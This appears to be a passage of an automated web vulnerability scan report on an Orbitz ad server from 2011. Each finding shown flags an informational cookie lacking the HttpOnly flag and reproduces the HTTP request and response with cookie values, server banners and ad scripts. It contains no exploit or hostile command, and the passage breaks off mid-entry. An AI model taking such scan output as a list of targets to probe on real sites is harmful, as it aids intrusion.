P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Set-Cookie: MKTG=ABCDEFGHU0VNfEMxMTI4N3g3MTl8IHwxMzE3NjAyMzI1NDY3fEMxMTI4N3g3MTl8fDEwLzAyLzIwMTEgMTk6Mzg6NDUgUE18IHwg; Domain=orbitz.com; Expires=Wed, 02-Nov-2011 00:38:45 GMT; Path=/
Set-Cookie: dpc=HOTEL%7C2.2%7C%7Cbos%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-09%7C2011-10-16%7C%7C+%7C%26%26HE; Expires=Fri, 02-Dec-2011 00:38:45 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:38:45 GMT
Content-Length: 243900


...[SNIP]...
14.264. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=225&rotator=true&width=519&adType=script&  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revresda.com
Path:   /html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=225&rotator=true&width=519&adType=script&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=225&rotator=true&width=519&adType=script& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:48 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aebaa22-24733-1570161280-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv004p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 32
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 32
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

var adRotator = new adRotator();
14.265. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revresda.com
Path:   /html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:48 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeb2422-10897-1302538563-3; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv002p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 1048
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 1048
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

var copy = 'Top hotel deals of the week';
var url = 'http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=why-book-hotels&cnt=PRO'
var target = '_parent';
// target is '_top' for internal links,
...[SNIP]...
14.266. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revresda.com
Path:   /html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:49 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeba921-13167-437180534-2; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv003p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
ntCoent-Length: 1068
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 1068
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

var copy = 'Save up to 35% at eco-friendly hotels';
var url = 'http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=eco-vacations&cnt=PRO&type=qs_dl'
var target = '_parent';
// target is '_top' f
...[SNIP]...
14.267. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revresda.com
Path:   /html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:49 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeba823-19234-1962717445-8; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv004p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 1086
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 1086
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

var copy = 'Enjoy fall savings of up to 40% off hotels';
var url = 'http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=qs_dl'
var target = '_parent';
// target is '_top'
...[SNIP]...
14.268. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revresda.com
Path:   /html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:48 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeb2422-10897-1123568220-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv003p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 1077
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 1077
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

var copy = 'Save up to 30% at Chicago hotels';
var url = 'http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=chicagovacation&cnt=PRO&type=qs_dl'
var target = '_parent';
// target is '_top' for
...[SNIP]...
14.269. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=55&width=120&  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revresda.com
Path:   /js.ng/channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=55&width=120&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=55&width=120& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:49 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeba823-17416-299776494-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv004p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
ntCoent-Length: 634
Content-Type: application/x-javascript
Cache-Control: private
Content-Length: 634
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

document.write('<a target=_blank href=\"http://www.revresda.com/event.ng/Type=click&FlightID=90921&AdID=174434&TargetID=57890&Segments=&Targets=&Values=60,80,92,101,194,216,264,32876,33113,33155,33227
...[SNIP]...
14.270. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=1&  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revresda.com
Path:   /js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=1&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=1& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:49 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeba921-22275-1014137345-2; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv001p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 920
Content-Type: application/x-javascript
Cache-Control: private
Content-Length: 920
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

document.write('<a target=\"_top\" href=\"http://www.revresda.com/event.ng/Type=click&FlightID=20847&AdID=46177&TargetID=9413&ASeg=&AMod=&Segments=65,3522,3724,4354,4979,5788,7409,8303,8427,8773,11672
...[SNIP]...
14.271. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=2&  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revresda.com
Path:   /js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=2&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=2& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:49 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeb2623-25195-512556733-4; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv002p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
ntCoent-Length: 968
Content-Type: application/x-javascript
Cache-Control: private
Content-Length: 968
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

document.write('<a target=\"_top\" href=\"http://www.revresda.com/event.ng/Type=click&FlightID=20847&AdID=46177&TargetID=9413&ASeg=&AMod=&Segments=65,3522,3724,4354,4979,5788,7409,8303,8427,8773,11672
...[SNIP]...
14.272. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=3&  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revresda.com
Path:   /js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=3&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=3& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:50 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeb2422-10899-784782887-2; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv002p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
ntCoent-Length: 920
Content-Type: application/x-javascript
Cache-Control: private
Content-Length: 920
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

document.write('<a target=\"_top\" href=\"http://www.revresda.com/event.ng/Type=click&FlightID=20847&AdID=46177&TargetID=9413&ASeg=&AMod=&Segments=65,3522,3724,4354,4979,5788,7409,8303,8427,8773,11672
...[SNIP]...
14.273. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=4&  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revresda.com
Path:   /js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=4&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=4& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:50 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeb2623-25195-1628532852-6; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv002p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 920
Content-Type: application/x-javascript
Cache-Control: private
Content-Length: 920
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

document.write('<a target=\"_top\" href=\"http://www.revresda.com/event.ng/Type=click&FlightID=20847&AdID=46177&TargetID=9413&ASeg=&AMod=&Segments=65,3522,3724,4354,4979,5788,7409,8303,8427,8773,11672
...[SNIP]...
14.274. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=336x600&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=600&width=336&adType=noframe&pos=external&  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revresda.com
Path:   /js.ng/channel=home&Section=main&adsize=336x600&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=600&width=336&adType=noframe&pos=external&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/channel=home&Section=main&adsize=336x600&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=600&width=336&adType=noframe&pos=external& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:47 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeba024-14631-593577608-5; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv002p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
ntCoent-Length: 964
Content-Type: application/x-javascript
Cache-Control: private
Content-Length: 964
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

document.write('<a target=\"_top\" href=\"http://www.revresda.com/event.ng/Type=click&FlightID=79312&AdID=151195&TargetID=41261&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,22067,
...[SNIP]...
14.275. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revresda.com
Path:   /js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:48 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeba124-9960-1392791335-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv002p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
ntCoent-Length: 140
Content-Type: application/x-javascript
Cache-Control: private
Content-Length: 140
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

document.write('<img src=\"http://www.revresda.com/Marketing/Images/US/ORB/ORB_Telesales_395.jpg\" border=0 height=71 width=396 alt=\"\">');
14.276. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=60&width=468&adType=noframe&  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revresda.com
Path:   /js.ng/channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=60&width=468&adType=noframe&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=60&width=468&adType=noframe& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:47 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeba823-17416-868641521-4; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv003p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
ntCoent-Length: 1016
Content-Type: application/x-javascript
Cache-Control: private
Content-Length: 1016
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

document.write('<a target=\"_top\" href=\"http://www.revresda.com/event.ng/Type=click&FlightID=79312&AdID=151195&TargetID=41261&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,22067,
...[SNIP]...
14.277. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=150&width=519&adType=noframe&  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revresda.com
Path:   /js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=150&width=519&adType=noframe&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=150&width=519&adType=noframe& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:47 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeba124-17043-1746758895-14; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv003p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Content-Type: application/x-javascript
Cache-Control: private
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly
Content-Length: 17640

document.write('');
var imgSrc = 'http://www.orbitz.com/Marketing/Images/US/MERCH/expmod/orb/ORB_exp_Home_20110819.jpg';
var defaultHref = 'http://www.orbitz.com/event.ng/Type=click&FlightID=81494&AdI
...[SNIP]...
14.278. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=90&width=728&adType=noframe&  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revresda.com
